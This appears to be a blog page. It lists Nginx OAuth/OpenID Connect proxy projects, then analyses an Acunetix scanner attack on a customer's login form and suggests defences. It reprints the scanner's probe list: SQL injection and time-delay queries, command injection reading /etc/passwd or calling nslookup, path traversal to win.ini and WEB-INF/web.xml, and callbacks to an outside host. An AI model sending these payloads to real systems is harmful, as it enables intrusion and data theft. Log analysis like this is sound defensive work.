Category: Hacking, Security, Vulnerabilities
[Linkset] Authorization termination: OAuth reverse proxy
UPDATE Today was released Nginx Plus with a new nginx-openid-connect module.
If you are looking for Authentication Server or OAuth library then OpenID Conect implementations page is a good place to start. I chose Keycloak but also want to look on FreeIPA or https://ipsilon-project.org
Keycloak Security Proxy but I want proxy as Nginx module and I need to implement something non standard.
Also there is some an OpenID/Keycloak Proxy service https://github.com/gambol99/keycloak-proxy
For Apache web server everything is clear:
https://github.com/zmartzone/mod_auth_openidc
But I need something for Nginx .
lua-resty-openidc and it’s intro blog post written in Lua so its easier to extend (so I did for implementing of custom grant flow+ sessions + reference tokens).
https://github.com/tarachandverma/nginx-openidc written fully in C++ and this is interesting because you don’t need to enable Lua on Nginx (believe me, this can be harmful).
What is also interesting is tha module for only one purpose: to use reference tokens (opaque tokens)
https://github.com/curityio/nginx_phantom_token_module it’s written in C so no needs for additional deps.
Authentication Based on Subrequest Result
Actually Nginx already has something that can satisfy 80% of your needs:
https://docs.nginx.com/nginx/admin-guide/security-controls/configuring-subrequest-authentication/
https://www.nginx.com/blog/nginx-plus-authenticate-users/
http://nginx.org/en/docs/http/ngx_http_auth_request_module.html
https://github.com/nginxinc/nginx-ldap-auth
https://redbyte.eu/en/blog/using-the-nginx-auth-request-module/
https://news.ycombinator.com/item?id=7641148
But to use the sebrequest auth your auth server should support this or you need to setup another shim proxy:
https://github.com/bitly/oauth2_proxy
and here is docker container which integrates it https://github.com/sinnerschrader/oauth-proxy-nginx
Or you can use this one which is written in Lua
https://github.com/jirutka/ngx-oauth
Bonus:
Important article from Security researcher Egor Homakov who hacked several times GitHub and Facebook:
Acunetix Web Vulnerability Scanner
One of my customer suffer from DDOS attack and site goes down.
In logs I found a lot of login requests with unexisting usernames but some of usernames contains exploits like SQL, JavaScript, command line injections.
For example:
admin |
tries to login as admin |
\"+response.write(9016645*9728826)+\" |
javascript injection |
(select convert(int,CHAR(65))) |
sql injection |
waitfor delay \'0:0:4\' |
do we have MSSQL? |
and (sleep(4)+1) limit 1 |
or MySQL? |
cat /etc/passwd;\' |
linux/bsd? tries to get contents of passwords |
^(#$!@#$)(()))* |
perl? (interpreting) |
;print(md5(acunetix_wvs_security_test)); |
checking for vulnerability PEAR XML_RPC 1.3.0 in PHP |
The list of exploits will be here bellow but please don’t open any links since they contains exploits too.
Analysis of exploits shown that this attack was performed by Acunetix Web Vulnerability Scanner.
In short this is just a robot that runs over your site and tests for known security issues.
Even if your site would be vulnerably, the scanner would not try to break anything, but it report the vulnerabilities to the attacker.
Each time when login performed site tries to lookup a user with the username in DB and when not it found return a NoSuchUserException. That’s creates a big load on DB.
So we will add to our login simple validation that username doesn’t contains any special symbols or spaces and return NoSuchUserException even without DB lookup.
That’s will minimize a database load on next attack. Also it would be great to write to logs some security alert.
Another one simple step to prevent this kind of attack is to avoid usernames like «admin», «user», «test» and similar.
List of exploits (please not that they have some random generated part):
!(()&&!|*|*| #{9999517+9999846} $(nslookup XaHYzdt9) ${9999517+9999846} ${@print(md5(acunetix_wvs_security_test))} ${@print(md5(acunetix_wvs_security_test))}\\ \";print(md5(acunetix_wvs_security_test));$a=\" \';print(md5(acunetix_wvs_security_test));$a=\' <!-- &nslookup wqTuHKgH&\'\\\"`0&nslookup wqTuHKgH&`\' (select convert(int,CHAR(65))) ) ))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) -1 OR 2+101-101-1=0+0+0+1 -- -1 OR 2+361-361-1=0+0+0+1 -1\" OR 2+167-167-1=0+0+0+1 -- -1\' OR 2+40-40-1=0+0+0+1 -- -1\' OR 2+881-881-1=0+0+0+1 or \'dvO3lt07\'=\' ................windowswin.ini ../../../../../../../../windows/win.ini /.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./windows/win.ini ../../../../../../../../../../windows/win.ini\0.tst \";cat /etc/passwd;\" /../..//../..//../..//../..//../..//etc/passwd\0.tst ./WEB-INF/web.xml ./WEB-INF/web.xml? WEB-INF/web.xml WEB-INF\\web.xml //WEB-INF/web.xml /forward:/WEB-INF/web.xml /static/WEB-INF/web.xml /www.vulnweb.com 1 1 waitfor delay \'0:0:9\' -- 1some_inexistent_file_with_long_name\0.jpg 1\'\" 1\0'" 5rRFX596\');select pg_sleep(3); -- a7C6fcfF\';select pg_sleep(3); -- CdU2ccxR\'));select pg_sleep(6); -- ;print(md5(acunetix_wvs_security_test)); @@Y7Mum admin Array asblyars&n934969=v921785 dxiHJlrn\'); waitfor delay \'0:0:13\' -- e&n903064=v900092 http://hitCNGUlQ53Jk.bxss.me/ http://testasp.vulnweb.com/t/fit.txt ibqxmqjh&n902289=v938342 JyI= response.write(9856682*9648787) set|set&set testasp.vulnweb.com wtqcgrsv&n912204=v936365 YlpOb05tVlA= yoUBQu2S ZPuBQkWY \"+response.write(9016645*9728826)+\" \'\" \'\"() \\ ^(#$!@#$)(()))****** ..À¯ sample%40email.tst and sleep(7.738) acunetix_wvs_invalid_filename
See also:
* https://eventespresso.com/tag/acunetix_wvs_security_test/
* https://www.fail2ban.org/
* https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project
* https://www.modsecurity.org/